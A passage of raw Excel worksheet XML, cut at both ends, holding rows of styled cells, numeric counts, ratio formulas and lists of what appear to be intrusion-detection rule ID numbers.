      <c r="IU7" s="127"/>
      <c r="IV7" s="127"/>
      <c r="IW7" s="127"/>
      <c r="IX7" s="127"/>
      <c r="IY7" s="127"/>
      <c r="IZ7" s="127"/>
      <c r="JA7" s="127"/>
      <c r="JB7" s="127"/>
      <c r="JC7" s="127"/>
      <c r="JD7" s="127"/>
      <c r="JE7" s="127"/>
      <c r="JF7" s="127"/>
      <c r="JG7" s="127"/>
      <c r="JH7" s="127"/>
      <c r="JI7" s="127"/>
      <c r="JJ7" s="127"/>
      <c r="JK7" s="127"/>
      <c r="JL7" s="127"/>
      <c r="JM7" s="127"/>
      <c r="JN7" s="127"/>
      <c r="JO7" s="127"/>
      <c r="JP7" s="127"/>
      <c r="JQ7" s="127"/>
      <c r="JR7" s="127"/>
      <c r="JS7" s="127"/>
      <c r="JT7" s="127"/>
      <c r="JU7" s="127"/>
      <c r="JV7" s="127"/>
      <c r="JW7" s="127"/>
      <c r="JX7" s="127"/>
      <c r="JY7" s="127"/>
      <c r="JZ7" s="127"/>
      <c r="KA7" s="127"/>
      <c r="KB7" s="127"/>
      <c r="KC7" s="127"/>
      <c r="KD7" s="127"/>
      <c r="KE7" s="127"/>
      <c r="KF7" s="127"/>
      <c r="KG7" s="127"/>
      <c r="KH7" s="127"/>
      <c r="KI7" s="127"/>
      <c r="KJ7" s="127"/>
      <c r="KK7" s="127"/>
      <c r="KL7" s="127"/>
      <c r="KM7" s="127"/>
      <c r="KN7" s="127"/>
      <c r="KO7" s="127"/>
      <c r="KP7" s="127"/>
      <c r="KQ7" s="127"/>
      <c r="KR7" s="127"/>
      <c r="KS7" s="127"/>
      <c r="KT7" s="127"/>
      <c r="KU7" s="127"/>
      <c r="KV7" s="127"/>
      <c r="KW7" s="127"/>
      <c r="KX7" s="127"/>
      <c r="KY7" s="127"/>
      <c r="KZ7" s="127"/>
      <c r="LA7" s="127"/>
      <c r="LB7" s="127"/>
      <c r="LC7" s="127"/>
      <c r="LD7" s="127"/>
      <c r="LE7" s="127"/>
      <c r="LF7" s="127"/>
      <c r="LG7" s="127"/>
      <c r="LH7" s="127"/>
      <c r="LI7" s="127"/>
      <c r="LJ7" s="127"/>
      <c r="LK7" s="127"/>
      <c r="LL7" s="127"/>
      <c r="LM7" s="127"/>
      <c r="LN7" s="127"/>
      <c r="LO7" s="127"/>
      <c r="LP7" s="127"/>
      <c r="LQ7" s="127"/>
      <c r="LR7" s="127"/>
      <c r="LS7" s="127"/>
      <c r="LT7" s="127"/>
      <c r="LU7" s="127"/>
      <c r="LV7" s="127"/>
      <c r="LW7" s="127"/>
      <c r="LX7" s="127"/>
      <c r="LY7" s="127"/>
      <c r="LZ7" s="127"/>
      <c r="MA7" s="127"/>
      <c r="MB7" s="127"/>
      <c r="MC7" s="127"/>
      <c r="MD7" s="127"/>
      <c r="ME7" s="127"/>
      <c r="MF7" s="127"/>
      <c r="MG7" s="127"/>
      <c r="MH7" s="127"/>
      <c r="MI7" s="127"/>
      <c r="MJ7" s="127"/>
      <c r="MK7" s="127"/>
      <c r="ML7" s="127"/>
      <c r="MM7" s="127"/>
      <c r="MN7" s="127"/>
      <c r="MO7" s="127"/>
      <c r="MP7" s="127"/>
      <c r="MQ7" s="127"/>
      <c r="MR7" s="127"/>
      <c r="MS7" s="127"/>
      <c r="MT7" s="127"/>
      <c r="MU7" s="127"/>
      <c r="MV7" s="127"/>
      <c r="MW7" s="127"/>
      <c r="MX7" s="127"/>
      <c r="MY7" s="127"/>
      <c r="MZ7" s="127"/>
      <c r="NA7" s="127"/>
      <c r="NB7" s="127"/>
      <c r="NC7" s="127"/>
      <c r="ND7" s="127"/>
      <c r="NE7" s="127"/>
      <c r="NF7" s="127"/>
      <c r="NG7" s="127"/>
      <c r="NH7" s="127"/>
      <c r="NI7" s="127"/>
      <c r="NJ7" s="127"/>
      <c r="NK7" s="127"/>
      <c r="NL7" s="127"/>
      <c r="NM7" s="127"/>
      <c r="NN7" s="127"/>
      <c r="NO7" s="127"/>
      <c r="NP7" s="127"/>
      <c r="NQ7" s="127"/>
      <c r="NR7" s="127"/>
      <c r="NS7" s="127"/>
      <c r="NT7" s="127"/>
      <c r="NU7" s="127"/>
      <c r="NV7" s="127"/>
      <c r="NW7" s="127"/>
      <c r="NX7" s="127"/>
      <c r="NY7" s="127"/>
    </row>
    <row r="8" ht="107.25" customHeight="1">
      <c r="B8" s="89" t="s">
        <v>310</v>
      </c>
      <c r="C8" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D8" s="90" t="s">
        <v>311</v>
      </c>
      <c r="E8" s="90" t="s">
        <v>312</v>
      </c>
      <c r="F8" s="90" t="s">
        <v>313</v>
      </c>
      <c r="G8" s="90" t="s">
        <v>12</v>
      </c>
      <c r="H8" s="90" t="s">
        <v>12</v>
      </c>
      <c r="I8" s="92" t="s">
        <v>314</v>
      </c>
      <c r="J8" s="92" t="s">
        <v>315</v>
      </c>
      <c r="K8" s="92" t="s">
        <v>316</v>
      </c>
      <c r="L8" s="93" t="s">
        <v>317</v>
      </c>
      <c r="M8" s="93">
        <v>1002.0</v>
      </c>
      <c r="N8" s="93">
        <v>1002.0</v>
      </c>
      <c r="O8" s="93">
        <v>0.0</v>
      </c>
      <c r="P8" s="93">
        <v>1002.0</v>
      </c>
      <c r="Q8" s="93">
        <f t="shared" si="1"/>
        <v>1002</v>
      </c>
      <c r="R8" s="93">
        <v>1002.0</v>
      </c>
      <c r="S8" s="93">
        <v>0.0</v>
      </c>
      <c r="T8" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U8" s="95" t="s">
        <v>224</v>
      </c>
      <c r="V8" s="96" t="s">
        <v>318</v>
      </c>
      <c r="W8" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X8" s="97" t="s">
        <v>319</v>
      </c>
      <c r="Y8" s="96" t="s">
        <v>320</v>
      </c>
      <c r="Z8" s="96" t="s">
        <v>321</v>
      </c>
      <c r="AA8" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB8" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC8" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD8" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE8" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF8" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG8" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH8" s="99" t="s">
        <v>322</v>
      </c>
      <c r="AI8" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ8" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK8" s="100" t="s">
        <v>323</v>
      </c>
      <c r="AL8" s="100">
        <v>2.0</v>
      </c>
      <c r="AM8" s="100">
        <v>2.0</v>
      </c>
      <c r="AN8" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO8" s="100" t="s">
        <v>323</v>
      </c>
      <c r="AP8" s="100">
        <v>2.0</v>
      </c>
      <c r="AQ8" s="100">
        <v>2.0</v>
      </c>
      <c r="AR8" s="100" t="s">
        <v>323</v>
      </c>
      <c r="AS8" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT8" s="100" t="str">
        <f t="shared" si="2"/>
        <v>1421, 1418</v>
      </c>
      <c r="AU8" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV8" s="100" t="s">
        <v>323</v>
      </c>
      <c r="AW8" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX8" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY8" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ8" s="100">
        <v>0.0</v>
      </c>
      <c r="BA8" s="102">
        <v>1002.0</v>
      </c>
      <c r="BB8" s="102">
        <v>2.0</v>
      </c>
      <c r="BC8" s="102">
        <v>2.0</v>
      </c>
      <c r="BD8" s="102">
        <v>2.0</v>
      </c>
      <c r="BE8" s="102">
        <v>0.0</v>
      </c>
      <c r="BF8" s="102">
        <v>0.0</v>
      </c>
      <c r="BG8" s="102">
        <v>0.0</v>
      </c>
      <c r="BH8" s="102">
        <v>0.0</v>
      </c>
      <c r="BI8" s="102">
        <v>2.0</v>
      </c>
      <c r="BJ8" s="102">
        <v>2.0</v>
      </c>
      <c r="BK8" s="102">
        <v>2.0</v>
      </c>
      <c r="BL8" s="103">
        <f t="shared" si="3"/>
        <v>0.001996007984</v>
      </c>
      <c r="BM8" s="103">
        <f t="shared" si="4"/>
        <v>0.001996007984</v>
      </c>
      <c r="BN8" s="103">
        <f t="shared" si="5"/>
        <v>0</v>
      </c>
      <c r="BO8" s="103">
        <f t="shared" si="6"/>
        <v>0.001996007984</v>
      </c>
      <c r="BP8" s="103">
        <f t="shared" si="7"/>
        <v>0.001996007984</v>
      </c>
      <c r="BQ8" s="103">
        <f t="shared" si="8"/>
        <v>0</v>
      </c>
      <c r="BR8" s="103">
        <f t="shared" si="9"/>
        <v>0.001996007984</v>
      </c>
      <c r="BS8" s="103">
        <f t="shared" si="10"/>
        <v>0.001996007984</v>
      </c>
      <c r="BT8" s="103">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="BU8" s="103">
        <f t="shared" si="12"/>
        <v>0</v>
      </c>
      <c r="BV8" s="103">
        <f t="shared" si="13"/>
        <v>0</v>
      </c>
      <c r="BW8" s="104" t="s">
        <v>324</v>
      </c>
      <c r="BX8" s="104">
        <v>8.0</v>
      </c>
      <c r="BY8" s="104">
        <v>8.0</v>
      </c>
      <c r="BZ8" s="101" t="s">
        <v>325</v>
      </c>
      <c r="CA8" s="104" t="s">
        <v>326</v>
      </c>
      <c r="CB8" s="104">
        <v>4.0</v>
      </c>
      <c r="CC8" s="104">
        <v>4.0</v>
      </c>
      <c r="CD8" s="104" t="s">
        <v>323</v>
      </c>
      <c r="CE8" s="104" t="s">
        <v>327</v>
      </c>
      <c r="CF8" s="104" t="str">
        <f t="shared" si="14"/>
        <v>1421, 1418</v>
      </c>
      <c r="CG8" s="104" t="s">
        <v>12</v>
      </c>
      <c r="CH8" s="104" t="str">
        <f t="shared" ref="CH8:CH9" si="62">IF(CF8="-",CG8,CF8)</f>
        <v>1421, 1418</v>
      </c>
      <c r="CI8" s="104" t="s">
        <v>328</v>
      </c>
      <c r="CJ8" s="129" t="s">
        <v>12</v>
      </c>
      <c r="CK8" s="129">
        <v>6.0</v>
      </c>
      <c r="CL8" s="129">
        <v>6.0</v>
      </c>
      <c r="CM8" s="105">
        <v>1002.0</v>
      </c>
      <c r="CN8" s="105">
        <v>8.0</v>
      </c>
      <c r="CO8" s="105">
        <v>8.0</v>
      </c>
      <c r="CP8" s="105">
        <v>2.0</v>
      </c>
      <c r="CQ8" s="105">
        <v>6.0</v>
      </c>
      <c r="CR8" s="105">
        <v>8.0</v>
      </c>
      <c r="CS8" s="105">
        <v>6.0</v>
      </c>
      <c r="CT8" s="105">
        <v>0.0</v>
      </c>
      <c r="CU8" s="105">
        <v>6.0</v>
      </c>
      <c r="CV8" s="105">
        <v>6.0</v>
      </c>
      <c r="CW8" s="105">
        <v>4.0</v>
      </c>
      <c r="CX8" s="105">
        <v>4.0</v>
      </c>
      <c r="CY8" s="105">
        <v>2.0</v>
      </c>
      <c r="CZ8" s="105">
        <v>2.0</v>
      </c>
      <c r="DA8" s="105">
        <v>4.0</v>
      </c>
      <c r="DB8" s="106">
        <f t="shared" si="15"/>
        <v>0.007984031936</v>
      </c>
      <c r="DC8" s="106">
        <f t="shared" si="16"/>
        <v>0.003992015968</v>
      </c>
      <c r="DD8" s="106">
        <f t="shared" si="17"/>
        <v>0.005988023952</v>
      </c>
      <c r="DE8" s="106">
        <f t="shared" si="18"/>
        <v>0.007984031936</v>
      </c>
      <c r="DF8" s="106">
        <f t="shared" si="19"/>
        <v>0.003992015968</v>
      </c>
      <c r="DG8" s="106">
        <f t="shared" si="20"/>
        <v>0.005988023952</v>
      </c>
      <c r="DH8" s="106">
        <f t="shared" si="21"/>
        <v>0.007984031936</v>
      </c>
      <c r="DI8" s="106">
        <f t="shared" si="22"/>
        <v>0.003992015968</v>
      </c>
      <c r="DJ8" s="106">
        <f t="shared" si="23"/>
        <v>0.005988023952</v>
      </c>
      <c r="DK8" s="107">
        <f t="shared" si="24"/>
        <v>0.005988023952</v>
      </c>
      <c r="DL8" s="106">
        <f t="shared" si="25"/>
        <v>1</v>
      </c>
      <c r="DM8" s="108" t="s">
        <v>329</v>
      </c>
      <c r="DN8" s="108">
        <v>8.0</v>
      </c>
      <c r="DO8" s="108">
        <v>8.0</v>
      </c>
      <c r="DP8" s="101" t="s">
        <v>327</v>
      </c>
      <c r="DQ8" s="108" t="s">
        <v>330</v>
      </c>
      <c r="DR8" s="108">
        <v>5.0</v>
      </c>
      <c r="DS8" s="108">
        <v>6.0</v>
      </c>
      <c r="DT8" s="108" t="s">
        <v>323</v>
      </c>
      <c r="DU8" s="108" t="s">
        <v>327</v>
      </c>
      <c r="DV8" s="108" t="str">
        <f t="shared" ref="DV8:DV14" si="63">IF(DT8="-",DU8,DT8)</f>
        <v>1421, 1418</v>
      </c>
      <c r="DW8" s="108" t="s">
        <v>12</v>
      </c>
      <c r="DX8" s="108" t="s">
        <v>323</v>
      </c>
      <c r="DY8" s="108" t="s">
        <v>331</v>
      </c>
      <c r="DZ8" s="108" t="s">
        <v>12</v>
      </c>
      <c r="EA8" s="108">
        <v>6.0</v>
      </c>
      <c r="EB8" s="108">
        <v>6.0</v>
      </c>
      <c r="EC8" s="109">
        <v>1002.0</v>
      </c>
      <c r="ED8" s="109">
        <v>8.0</v>
      </c>
      <c r="EE8" s="109">
        <v>8.0</v>
      </c>
      <c r="EF8" s="109">
        <v>2.0</v>
      </c>
      <c r="EG8" s="109">
        <v>6.0</v>
      </c>
      <c r="EH8" s="109">
        <v>8.0</v>
      </c>
      <c r="EI8" s="109">
        <v>6.0</v>
      </c>
      <c r="EJ8" s="109">
        <v>0.0</v>
      </c>
      <c r="EK8" s="109">
        <v>6.0</v>
      </c>
      <c r="EL8" s="109">
        <v>6.0</v>
      </c>
      <c r="EM8" s="109">
        <v>4.0</v>
      </c>
      <c r="EN8" s="109">
        <v>4.0</v>
      </c>
      <c r="EO8" s="109">
        <v>2.0</v>
      </c>
      <c r="EP8" s="109">
        <v>2.0</v>
      </c>
      <c r="EQ8" s="109">
        <v>4.0</v>
      </c>
      <c r="ER8" s="110">
        <f t="shared" si="27"/>
        <v>0.007984031936</v>
      </c>
      <c r="ES8" s="110">
        <f t="shared" si="28"/>
        <v>0.003992015968</v>
      </c>
      <c r="ET8" s="110">
        <f t="shared" si="29"/>
        <v>0.005988023952</v>
      </c>
      <c r="EU8" s="110">
        <f t="shared" si="30"/>
        <v>0.007984031936</v>
      </c>
      <c r="EV8" s="110">
        <f t="shared" si="31"/>
        <v>0.003992015968</v>
      </c>
      <c r="EW8" s="110">
        <f t="shared" si="32"/>
        <v>0.005988023952</v>
      </c>
      <c r="EX8" s="110">
        <f t="shared" si="33"/>
        <v>0.007984031936</v>
      </c>
      <c r="EY8" s="110">
        <f t="shared" si="34"/>
        <v>0.003992015968</v>
      </c>
      <c r="EZ8" s="110">
        <f t="shared" si="35"/>
        <v>0.005988023952</v>
      </c>
      <c r="FA8" s="110">
        <f t="shared" si="36"/>
        <v>0.005988023952</v>
      </c>
      <c r="FB8" s="110">
        <f t="shared" si="37"/>
        <v>1</v>
      </c>
      <c r="FC8" s="111" t="s">
        <v>332</v>
      </c>
      <c r="FD8" s="111">
        <v>12.0</v>
      </c>
      <c r="FE8" s="111">
        <v>14.0</v>
      </c>
      <c r="FF8" s="101" t="s">
        <v>333</v>
      </c>
      <c r="FG8" s="111" t="s">
        <v>334</v>
      </c>
      <c r="FH8" s="111">
        <v>5.0</v>
      </c>
      <c r="FI8" s="111">
        <v>5.0</v>
      </c>
      <c r="FJ8" s="111" t="s">
        <v>335</v>
      </c>
      <c r="FK8" s="111" t="s">
        <v>336</v>
      </c>
      <c r="FL8" s="111" t="str">
        <f t="shared" ref="FL8:FL16" si="64">IF(FJ8="-",FK8,FJ8)</f>
        <v>1421, 1418, 2002752, 2002749, 2101418, 2100615</v>
      </c>
      <c r="FM8" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FN8" s="111" t="s">
        <v>335</v>
      </c>
      <c r="FO8" s="111" t="s">
        <v>331</v>
      </c>
      <c r="FP8" s="111" t="s">
        <v>12</v>
      </c>
      <c r="FQ8" s="111">
        <v>6.0</v>
      </c>
      <c r="FR8" s="111">
        <v>6.0</v>
      </c>
      <c r="FS8" s="112">
        <v>1002.0</v>
      </c>
      <c r="FT8" s="112">
        <v>10.0</v>
      </c>
      <c r="FU8" s="112">
        <v>11.0</v>
      </c>
      <c r="FV8" s="112">
        <v>2.0</v>
      </c>
      <c r="FW8" s="112">
        <v>12.0</v>
      </c>
      <c r="FX8" s="112">
        <v>14.0</v>
      </c>
      <c r="FY8" s="112">
        <v>6.0</v>
      </c>
      <c r="FZ8" s="112">
        <v>0.0</v>
      </c>
      <c r="GA8" s="112">
        <v>6.0</v>
      </c>
      <c r="GB8" s="112">
        <v>6.0</v>
      </c>
      <c r="GC8" s="112">
        <v>4.0</v>
      </c>
      <c r="GD8" s="112">
        <v>4.0</v>
      </c>
      <c r="GE8" s="112">
        <v>2.0</v>
      </c>
      <c r="GF8" s="112">
        <v>3.0</v>
      </c>
      <c r="GG8" s="112">
        <v>5.0</v>
      </c>
      <c r="GH8" s="113">
        <f t="shared" si="39"/>
        <v>0.00998003992</v>
      </c>
      <c r="GI8" s="113">
        <f t="shared" si="40"/>
        <v>0.003992015968</v>
      </c>
      <c r="GJ8" s="113">
        <f t="shared" si="41"/>
        <v>0.005988023952</v>
      </c>
      <c r="GK8" s="113">
        <f t="shared" si="42"/>
        <v>0.01097804391</v>
      </c>
      <c r="GL8" s="113">
        <f t="shared" si="43"/>
        <v>0.003992015968</v>
      </c>
      <c r="GM8" s="113">
        <f t="shared" si="44"/>
        <v>0.005988023952</v>
      </c>
      <c r="GN8" s="113">
        <f t="shared" si="45"/>
        <v>0.01397205589</v>
      </c>
      <c r="GO8" s="113">
        <f t="shared" si="46"/>
        <v>0.00499001996</v>
      </c>
      <c r="GP8" s="113">
        <f t="shared" si="47"/>
        <v>0.005988023952</v>
      </c>
      <c r="GQ8" s="114">
        <f t="shared" si="48"/>
        <v>0.005988023952</v>
      </c>
      <c r="GR8" s="113">
        <f t="shared" si="49"/>
        <v>1</v>
      </c>
      <c r="GS8" s="115" t="s">
        <v>13</v>
      </c>
      <c r="GT8" s="94" t="s">
        <v>337</v>
      </c>
      <c r="GU8" s="116">
        <v>43814.0</v>
      </c>
      <c r="GV8" s="116">
        <v>1.0</v>
      </c>
      <c r="GW8" s="116">
        <v>6.0</v>
      </c>
      <c r="GX8" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GY8" s="117" t="s">
        <v>12</v>
      </c>
      <c r="GZ8" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HA8" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HB8" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HC8" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HD8" s="131">
        <v>43814.0</v>
      </c>
      <c r="HE8" s="131">
        <v>43814.0</v>
      </c>
      <c r="HF8" s="117" t="str">
        <f t="shared" si="50"/>
        <v>-</v>
      </c>
      <c r="HG8" s="117" t="s">
        <v>12</v>
      </c>
      <c r="HH8" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HI8" s="116" t="s">
        <v>12</v>
      </c>
      <c r="HJ8" s="93" t="s">
        <v>338</v>
      </c>
      <c r="HK8" s="93" t="str">
        <f t="shared" si="51"/>
        <v>SI</v>
      </c>
      <c r="HL8" s="93">
        <v>1002.0</v>
      </c>
      <c r="HM8" s="93">
        <f t="shared" si="52"/>
        <v>6</v>
      </c>
      <c r="HN8" s="93">
        <v>6.0</v>
      </c>
      <c r="HO8" s="93">
        <v>0.0</v>
      </c>
      <c r="HP8" s="93">
        <v>6.0</v>
      </c>
      <c r="HQ8" s="118">
        <f t="shared" si="53"/>
        <v>0.005988023952</v>
      </c>
      <c r="HR8" s="118">
        <f t="shared" si="54"/>
        <v>0.005988023952</v>
      </c>
      <c r="HS8" s="118">
        <f t="shared" si="55"/>
        <v>1</v>
      </c>
      <c r="HT8" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HU8" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HV8" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HW8" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HX8" s="119" t="s">
        <v>12</v>
      </c>
      <c r="HY8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="HZ8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IA8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IB8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IC8" s="120" t="str">
        <f t="shared" si="61"/>
        <v>-</v>
      </c>
      <c r="ID8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IE8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IF8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IG8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="IH8" s="120" t="s">
        <v>12</v>
      </c>
      <c r="II8" s="99" t="s">
        <v>12</v>
      </c>
      <c r="IJ8" s="98" t="str">
        <f t="shared" si="56"/>
        <v>SI</v>
      </c>
      <c r="IK8" s="99">
        <v>1002.0</v>
      </c>
      <c r="IL8" s="99">
        <v>0.0</v>
      </c>
      <c r="IM8" s="121">
        <f t="shared" si="57"/>
        <v>0</v>
      </c>
      <c r="IN8" s="122" t="s">
        <v>230</v>
      </c>
      <c r="IO8" s="98">
        <v>0.0</v>
      </c>
      <c r="IP8" s="123">
        <f t="shared" si="58"/>
        <v>0</v>
      </c>
      <c r="IQ8" s="118">
        <f t="shared" si="59"/>
        <v>0</v>
      </c>
      <c r="IR8" s="118">
        <f t="shared" si="60"/>
        <v>0</v>
      </c>
      <c r="IS8" s="124" t="s">
        <v>13</v>
      </c>
      <c r="IT8" s="127"/>
      <c r="IU8" s="127"/>
      <c r="IV8" s="127"/>
      <c r="IW8" s="127"/>
      <c r="IX8" s="127"/>
      <c r="IY8" s="127"/>
      <c r="IZ8" s="127"/>
      <c r="JA8" s="127"/>
      <c r="JB8" s="127"/>
      <c r="JC8" s="127"/>
      <c r="JD8" s="127"/>
      <c r="JE8" s="127"/>
      <c r="JF8" s="127"/>
      <c r="JG8" s="127"/>
      <c r="JH8" s="127"/>
      <c r="JI8" s="127"/>
      <c r="JJ8" s="127"/>
      <c r="JK8" s="127"/>
      <c r="JL8" s="127"/>
      <c r="JM8" s="127"/>
      <c r="JN8" s="127"/>
      <c r="JO8" s="127"/>
      <c r="JP8" s="127"/>
      <c r="JQ8" s="127"/>
      <c r="JR8" s="127"/>
      <c r="JS8" s="127"/>
      <c r="JT8" s="127"/>
      <c r="JU8" s="127"/>
      <c r="JV8" s="127"/>
      <c r="JW8" s="127"/>
      <c r="JX8" s="127"/>
      <c r="JY8" s="127"/>
      <c r="JZ8" s="127"/>
      <c r="KA8" s="127"/>
      <c r="KB8" s="127"/>
      <c r="KC8" s="127"/>
      <c r="KD8" s="127"/>
      <c r="KE8" s="127"/>
      <c r="KF8" s="127"/>
      <c r="KG8" s="127"/>
      <c r="KH8" s="127"/>
      <c r="KI8" s="127"/>
      <c r="KJ8" s="127"/>
      <c r="KK8" s="127"/>
      <c r="KL8" s="127"/>
      <c r="KM8" s="127"/>
      <c r="KN8" s="127"/>
      <c r="KO8" s="127"/>
      <c r="KP8" s="127"/>
      <c r="KQ8" s="127"/>
      <c r="KR8" s="127"/>
      <c r="KS8" s="127"/>
      <c r="KT8" s="127"/>
      <c r="KU8" s="127"/>
      <c r="KV8" s="127"/>
      <c r="KW8" s="127"/>
      <c r="KX8" s="127"/>
      <c r="KY8" s="127"/>
      <c r="KZ8" s="127"/>
      <c r="LA8" s="127"/>
      <c r="LB8" s="127"/>
      <c r="LC8" s="127"/>
      <c r="LD8" s="127"/>
      <c r="LE8" s="127"/>
      <c r="LF8" s="127"/>
      <c r="LG8" s="127"/>
      <c r="LH8" s="127"/>
      <c r="LI8" s="127"/>
      <c r="LJ8" s="127"/>
      <c r="LK8" s="127"/>
      <c r="LL8" s="127"/>
      <c r="LM8" s="127"/>
      <c r="LN8" s="127"/>
      <c r="LO8" s="127"/>
      <c r="LP8" s="127"/>
      <c r="LQ8" s="127"/>
      <c r="LR8" s="127"/>
      <c r="LS8" s="127"/>
      <c r="LT8" s="127"/>
      <c r="LU8" s="127"/>
      <c r="LV8" s="127"/>
      <c r="LW8" s="127"/>
      <c r="LX8" s="127"/>
      <c r="LY8" s="127"/>
      <c r="LZ8" s="127"/>
      <c r="MA8" s="127"/>
      <c r="MB8" s="127"/>
      <c r="MC8" s="127"/>
      <c r="MD8" s="127"/>
      <c r="ME8" s="127"/>
      <c r="MF8" s="127"/>
      <c r="MG8" s="127"/>
      <c r="MH8" s="127"/>
      <c r="MI8" s="127"/>
      <c r="MJ8" s="127"/>
      <c r="MK8" s="127"/>
      <c r="ML8" s="127"/>
      <c r="MM8" s="127"/>
      <c r="MN8" s="127"/>
      <c r="MO8" s="127"/>
      <c r="MP8" s="127"/>
      <c r="MQ8" s="127"/>
      <c r="MR8" s="127"/>
      <c r="MS8" s="127"/>
      <c r="MT8" s="127"/>
      <c r="MU8" s="127"/>
      <c r="MV8" s="127"/>
      <c r="MW8" s="127"/>
      <c r="MX8" s="127"/>
      <c r="MY8" s="127"/>
      <c r="MZ8" s="127"/>
      <c r="NA8" s="127"/>
      <c r="NB8" s="127"/>
      <c r="NC8" s="127"/>
      <c r="ND8" s="127"/>
      <c r="NE8" s="127"/>
      <c r="NF8" s="127"/>
      <c r="NG8" s="127"/>
      <c r="NH8" s="127"/>
      <c r="NI8" s="127"/>
      <c r="NJ8" s="127"/>
      <c r="NK8" s="127"/>
      <c r="NL8" s="127"/>
      <c r="NM8" s="127"/>
      <c r="NN8" s="127"/>
      <c r="NO8" s="127"/>
      <c r="NP8" s="127"/>
      <c r="NQ8" s="127"/>
      <c r="NR8" s="127"/>
      <c r="NS8" s="127"/>
      <c r="NT8" s="127"/>
      <c r="NU8" s="127"/>
      <c r="NV8" s="127"/>
      <c r="NW8" s="127"/>
      <c r="NX8" s="127"/>
      <c r="NY8" s="127"/>
    </row>
    <row r="9" ht="107.25" customHeight="1">
      <c r="B9" s="89" t="s">
        <v>292</v>
      </c>
      <c r="C9" s="90" t="s">
        <v>12</v>
      </c>
      <c r="D9" s="90" t="s">
        <v>293</v>
      </c>
      <c r="E9" s="90" t="s">
        <v>339</v>
      </c>
      <c r="F9" s="90" t="s">
        <v>340</v>
      </c>
      <c r="G9" s="91" t="s">
        <v>341</v>
      </c>
      <c r="H9" s="90" t="s">
        <v>342</v>
      </c>
      <c r="I9" s="92" t="s">
        <v>343</v>
      </c>
      <c r="J9" s="92" t="s">
        <v>344</v>
      </c>
      <c r="K9" s="92" t="s">
        <v>345</v>
      </c>
      <c r="L9" s="93" t="s">
        <v>218</v>
      </c>
      <c r="M9" s="93">
        <v>26.0</v>
      </c>
      <c r="N9" s="93">
        <v>1.0</v>
      </c>
      <c r="O9" s="93">
        <v>0.0</v>
      </c>
      <c r="P9" s="93">
        <v>1.0</v>
      </c>
      <c r="Q9" s="93">
        <f t="shared" si="1"/>
        <v>1</v>
      </c>
      <c r="R9" s="93">
        <v>1.0</v>
      </c>
      <c r="S9" s="93">
        <v>0.0</v>
      </c>
      <c r="T9" s="94" t="s">
        <v>12</v>
      </c>
      <c r="U9" s="95" t="s">
        <v>219</v>
      </c>
      <c r="V9" s="96" t="s">
        <v>346</v>
      </c>
      <c r="W9" s="96" t="s">
        <v>12</v>
      </c>
      <c r="X9" s="97" t="s">
        <v>347</v>
      </c>
      <c r="Y9" s="96" t="s">
        <v>348</v>
      </c>
      <c r="Z9" s="96" t="s">
        <v>349</v>
      </c>
      <c r="AA9" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AB9" s="95" t="s">
        <v>224</v>
      </c>
      <c r="AC9" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AD9" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AE9" s="95" t="s">
        <v>225</v>
      </c>
      <c r="AF9" s="95" t="s">
        <v>13</v>
      </c>
      <c r="AG9" s="98" t="s">
        <v>226</v>
      </c>
      <c r="AH9" s="99" t="s">
        <v>350</v>
      </c>
      <c r="AI9" s="99" t="s">
        <v>228</v>
      </c>
      <c r="AJ9" s="99" t="s">
        <v>225</v>
      </c>
      <c r="AK9" s="100">
        <v>402.0</v>
      </c>
      <c r="AL9" s="100">
        <v>1.0</v>
      </c>
      <c r="AM9" s="100">
        <v>28.0</v>
      </c>
      <c r="AN9" s="101" t="s">
        <v>12</v>
      </c>
      <c r="AO9" s="100">
        <v>402.0</v>
      </c>
      <c r="AP9" s="100">
        <v>1.0</v>
      </c>
      <c r="AQ9" s="100">
        <v>28.0</v>
      </c>
      <c r="AR9" s="100">
        <v>402.0</v>
      </c>
      <c r="AS9" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AT9" s="100">
        <f t="shared" si="2"/>
        <v>402</v>
      </c>
      <c r="AU9" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AV9" s="100">
        <v>402.0</v>
      </c>
      <c r="AW9" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AX9" s="100" t="s">
        <v>12</v>
      </c>
      <c r="AY9" s="100">
        <v>0.0</v>
      </c>
      <c r="AZ9" s="100">
        <v>0.0</v>
      </c>
      <c r="BA9" s="102">
        <v>26.0</v>
      </c>
      <c r="BB9" s="102">
